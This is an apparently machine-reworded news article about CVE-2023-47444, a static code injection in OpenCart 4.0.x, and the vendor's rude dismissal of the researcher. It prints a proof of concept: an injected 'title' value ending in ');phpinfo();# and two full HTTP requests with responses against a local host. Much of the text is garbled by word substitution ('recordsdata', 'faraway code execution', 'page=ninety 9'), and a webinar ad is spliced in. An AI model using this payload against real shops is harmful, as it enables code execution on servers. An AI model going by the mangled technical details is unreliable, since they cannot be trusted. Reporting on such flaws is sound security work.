Researcher Discloses OpenCart Vulnerability; Company Reacts Aggressively
A security researcher who goes below the title “0xbro” came correct by strategy of a Static code injection vulnerability in OpenCart, which enables the writing of arbitrary untrusted recordsdata on config.php and admin/config.php recordsdata that can even result in faraway code execution.
This vulnerability was assigned CVE-2023-47444, and the severity was 8.8 (Excessive).
Nonetheless, a guilty disclosure was fabricated from the protection researcher to OpenCart, which was no longer answered to politely. The administrator, who goes by the title Daniel Kerr, answered to his file announcing, “ur a f**kng tim.e waster“.
CVE-2023-47444: Authenticated Static Code Injections in OpenCart
This vulnerability exists in OpenCart versions 4.0.0.0 to 4.0.2.3, which enables an authenticated user with total/security “bag entry to” and “regulate” privileges to write untrusted arbitrary recordsdata to the config.php and admin/config.php which can even result in faraway code execution.
This vulnerability existed on two capabilities, regarded as one of which strikes the storage folder exterior the appliance web root and one other that renames the important thing admin course after the set up.
Reside API Assault Simulation Webinar
Within the upcoming webinar, Karthik Krishnamoorthy, CTO and Vivek Gopalan, VP of Merchandise at Indusface indicate how APIs can even be hacked. The session will duvet: an exploit of OWASP API Top 10 vulnerability, a brute drive chronicle rob-over (ATO) assault on API, a DDoS assault on an API, how a WAAP can even bolster security over an API gateway
Prerequisites and Proof of Idea
In repeat to money in on this vulnerability, the risk actor must possess real credentials to the backend dashboard alongside with written permission on the total/security. As well to to this, the admin/ folder have to be a default one and no longer renamed.
As per the proof-of-opinion for this vulnerability, the requests have to be sent in two directions.
- route=total/security.storage&title=pwned’);phpinfo();%23&course=
&user_token= - route=total/security.storage&title=pwned’);phpinfo();%23&course=
&user_token= &page=ninety 9
First Ask
GET /admin_secret/index.php?route=total/security.storage&title=pwned’);phpinfo();%23&course=/house/kali/Initiatives/OpenCart/4.0.2.3/&user_token=e5e8e0f6369ef124dd3d94d4d4e1d8ad HTTP/1.1Host: 127.0.0.1:8888Cookie: OCSESSID=fbc47c7e5098550f0c12070be0 — RESPONSE — HTTP/1.1 200 OK {“subsequent”:”http://127.0.0.1:8888/admin_secret/index.php?route=total/security.storage&user_token=e5e8e0f6369ef124dd3d94d4d4e1d8ad&title=pwned’);phpinfo();#&course=/house/kali/Initiatives/OpenCart/4.0.2.3/&page=2″} |
2nd Ask
GET /admin_secret/index.php?route=total/security.storage&title=pwned’);phpinfo();%23&course=/house/kali/Initiatives/OpenCart/4.0.2.3/&user_token=e5e8e0f6369ef124dd3d94d4d4e1d8ad&page=ninety 9 HTTP/1.1Host: 127.0.0.1:8888Cookie: OCSESSID=fbc47c7e5098550f0c12070be0 — RESPONSE — HTTP/1.1 200 OK {“success”:”Success: Storage directory has been moved!”} |
In conjunction with to the response from OpenCart, the administrators additionally closed the pull request on GitHub, declaring it as a “non-vulnerability”. Nonetheless, the repair was later merged into the grasp.
A full file about this vulnerability and the OpenCart response has been printed, offering detailed recordsdata on the proof-of-opinion and other recordsdata.
Source credit : cybersecuritynews.com